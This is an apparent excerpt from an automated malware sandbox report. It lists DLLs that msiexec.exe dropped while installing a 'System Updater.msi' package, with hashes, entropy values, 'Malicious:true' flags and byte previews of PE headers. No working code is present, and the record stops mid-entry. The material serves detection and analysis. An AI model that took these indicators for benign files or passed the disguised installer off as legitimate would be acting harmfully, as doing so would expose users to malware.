                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@Lt.W.@.....@.....@.....@.....@.....@......&.{798E61D4-8923-4E77-A74B-2DF264394A48}..Windows Installer..System Updater.msi.@.....@.....@.....@......logo.exe..&.{BF7EE51F-4DE9-4BDC-9A63-5AFDBF8C954B}.....@.....@.....@.....@.......@.....@.....@.......@......Windows Installer......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{DECF3B3F-BFBA-4EB7-8878-E4C409356ABA}2.C:\Program Files (x86)\AW Manager\Windows Manager\.@.......@.....@.....@......&.{71730F5F-0233-4DB3-A1F2-B0AD0A1B831F}=.02:\Software\AdvancedWindowsManager\Windows Installer\Version.@.......@.....@.....@......&.{408CE191-A5E9-46B9-ADB0-4347C8FF9F0C}d.02:\Software\Caphyon\Advanced Installer\LZMA\{798E61D4-8923-4E77-A74B-2DF264394A48}\5.0.4\AI_ExePath.@.......@.....@.....@......&.{58381363-55CC-4691-9CA4-9F7C23C7CB30}E.C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ex
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):292368
                                                                                                                                                                                                                                                                        Entropy (8bit):6.580138988083988
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:M4cV2yAOd5NQJwDpShZ7N1SAO1CbPJwXCPf:M42H5NQoWsnC1wXCPf
                                                                                                                                                                                                                                                                        MD5:F22242557CF91EA887BC21645D5B686F
                                                                                                                                                                                                                                                                        SHA1:668BAD3EAC0EB2485C4A64A0D2AB05999E1A89F3
                                                                                                                                                                                                                                                                        SHA-256:68D31D992CB7727DB2741C07A1347467B05501C701B8A618CD1FD5CA9BED4A8C
                                                                                                                                                                                                                                                                        SHA-512:E7587446ADA692F29BC8EEE1753539CC850DB314F57960AFBA770500F49002244A7C2D0BCBDABAC9EDA3BC0BBC47F1B2AC809997A728145E3CF041BB5DF376E4
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s.. .. .. 9..!.. 9..!M.. ...!... ...!... ...!... 9..!.. 9..!.. 9..!... .. ;.. j..!.. j..!.. j.$ .. .L .. j..!.. Rich.. ........PE..L.....gb.........."!.........h.......A....................................................@.........................`.......p........P..x............X.......`...)..X...p...............................@............................................text.../........................... ..`.rdata..>...........................@..@.data........0......................@....rsrc...x....P.......(..............@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):292368
                                                                                                                                                                                                                                                                        Entropy (8bit):6.580138988083988
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:M4cV2yAOd5NQJwDpShZ7N1SAO1CbPJwXCPf:M42H5NQoWsnC1wXCPf
                                                                                                                                                                                                                                                                        MD5:F22242557CF91EA887BC21645D5B686F
                                                                                                                                                                                                                                                                        SHA1:668BAD3EAC0EB2485C4A64A0D2AB05999E1A89F3
                                                                                                                                                                                                                                                                        SHA-256:68D31D992CB7727DB2741C07A1347467B05501C701B8A618CD1FD5CA9BED4A8C
                                                                                                                                                                                                                                                                        SHA-512:E7587446ADA692F29BC8EEE1753539CC850DB314F57960AFBA770500F49002244A7C2D0BCBDABAC9EDA3BC0BBC47F1B2AC809997A728145E3CF041BB5DF376E4
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s.. .. .. 9..!.. 9..!M.. ...!... ...!... ...!... 9..!.. 9..!.. 9..!... .. ;.. j..!.. j..!.. j.$ .. .L .. j..!.. Rich.. ........PE..L.....gb.........."!.........h.......A....................................................@.........................`.......p........P..x............X.......`...)..X...p...............................@............................................text.../........................... ..`.rdata..>...........................@..@.data........0......................@....rsrc...x....P.......(..............@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):194064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.416801574526807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:pj+sQSJ38YR4h04SZto/ycbzhfIZk7yukfxYJyAfqgT7Z14hZliQiPD4:J+FQ38t/SZfkVfISkC7R7Z1uri0
                                                                                                                                                                                                                                                                        MD5:B0DDA68E058A4CAA8B88AA2A47961D2A
                                                                                                                                                                                                                                                                        SHA1:76AF9DE0D7512B9581A787648C2F8997EC1347DD
                                                                                                                                                                                                                                                                        SHA-256:05640FEC802CC4F0F0865671473E54187CA3FC495B17D62E6D89B0019DDA9291
                                                                                                                                                                                                                                                                        SHA-512:DA9F0EE169DEB615B1B771963F4FE0039E20E45D45A8AE6FAEEF22C9B8E5833F8F1EB67A4D3C4B0DD7DBB134DA6230142ADA3579D81A4020D4E4FB05EE9A5731
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...),.(...),.(o..)..(.)..(.),.(.)..(..),.(...),.(.)...)...)..(.)..(...)..g)...)...)...)..(...)Rich...)........PE..L...].gb.........."!......................... ......................................i.....@.........................@..........x.......x............................y..p...................@z.......$..@............ ......L...@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):292368
                                                                                                                                                                                                                                                                        Entropy (8bit):6.580138988083988
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:M4cV2yAOd5NQJwDpShZ7N1SAO1CbPJwXCPf:M42H5NQoWsnC1wXCPf
                                                                                                                                                                                                                                                                        MD5:F22242557CF91EA887BC21645D5B686F
                                                                                                                                                                                                                                                                        SHA1:668BAD3EAC0EB2485C4A64A0D2AB05999E1A89F3
                                                                                                                                                                                                                                                                        SHA-256:68D31D992CB7727DB2741C07A1347467B05501C701B8A618CD1FD5CA9BED4A8C
                                                                                                                                                                                                                                                                        SHA-512:E7587446ADA692F29BC8EEE1753539CC850DB314F57960AFBA770500F49002244A7C2D0BCBDABAC9EDA3BC0BBC47F1B2AC809997A728145E3CF041BB5DF376E4
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s.. .. .. 9..!.. 9..!M.. ...!... ...!... ...!... 9..!.. 9..!.. 9..!... .. ;.. j..!.. j..!.. j.$ .. .L .. j..!.. Rich.. ........PE..L.....gb.........."!.........h.......A....................................................@.........................`.......p........P..x............X.......`...)..X...p...............................@............................................text.../........................... ..`.rdata..>...........................@..@.data........0......................@....rsrc...x....P.......(..............@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):808464
                                                                                                                                                                                                                                                                        Entropy (8bit):6.399509710294407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:LPO8KYTJAJ5NqLaphV6mzFf3zLha2xqe4k+pqm8esHxYs265R3PPn70+8xM9:LG/pPhPzLM28e4UtHh5R3PPn70+8xM9
                                                                                                                                                                                                                                                                        MD5:DD1F93EB81E6C99BA9BE55B0C12E8BB4
                                                                                                                                                                                                                                                                        SHA1:1D767983AAA4EB5C9E19409CF529969142033850
                                                                                                                                                                                                                                                                        SHA-256:F55B853958F07B15F0DAE7A871C1EBE2EC117EF54BA3811D31CEC4C8AE471D9B
                                                                                                                                                                                                                                                                        SHA-512:7968839CA3E7337B2E7774D92C4A3666E9B7D8D76000475B39C2BDA6DB3320FC9B2100322505997798AF5631A007787FBD8D0D6FE0B51949C545C67E696AAF1A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......bu.2&..a&..a&..a.f.`+..a.f.`...aDl.`7..aDl.`>..aDl.`u..a.f.`>..a.f.`'..a.f.`;..a&..a...a.m.`h..a.m.`'..a.m(a'..a&.@a$..a.m.`'..aRich&..a........................PE..L.....gb.........."!.........R......................................................4/....@......................... ................................8..........p...H...p...............................@............................................text...x........................... ..`.rdata..0...........................@..@.data...@...........................@....rsrc................B..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):808464
                                                                                                                                                                                                                                                                        Entropy (8bit):6.399509710294407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:LPO8KYTJAJ5NqLaphV6mzFf3zLha2xqe4k+pqm8esHxYs265R3PPn70+8xM9:LG/pPhPzLM28e4UtHh5R3PPn70+8xM9
                                                                                                                                                                                                                                                                        MD5:DD1F93EB81E6C99BA9BE55B0C12E8BB4
                                                                                                                                                                                                                                                                        SHA1:1D767983AAA4EB5C9E19409CF529969142033850
                                                                                                                                                                                                                                                                        SHA-256:F55B853958F07B15F0DAE7A871C1EBE2EC117EF54BA3811D31CEC4C8AE471D9B
                                                                                                                                                                                                                                                                        SHA-512:7968839CA3E7337B2E7774D92C4A3666E9B7D8D76000475B39C2BDA6DB3320FC9B2100322505997798AF5631A007787FBD8D0D6FE0B51949C545C67E696AAF1A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......bu.2&..a&..a&..a.f.`+..a.f.`...aDl.`7..aDl.`>..aDl.`u..a.f.`>..a.f.`'..a.f.`;..a&..a...a.m.`h..a.m.`'..a.m(a'..a&.@a$..a.m.`'..aRich&..a........................PE..L.....gb.........."!.........R......................................................4/....@......................... ................................8..........p...H...p...............................@............................................text...x........................... ..`.rdata..0...........................@..@.data...@...........................@....rsrc................B..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):20480
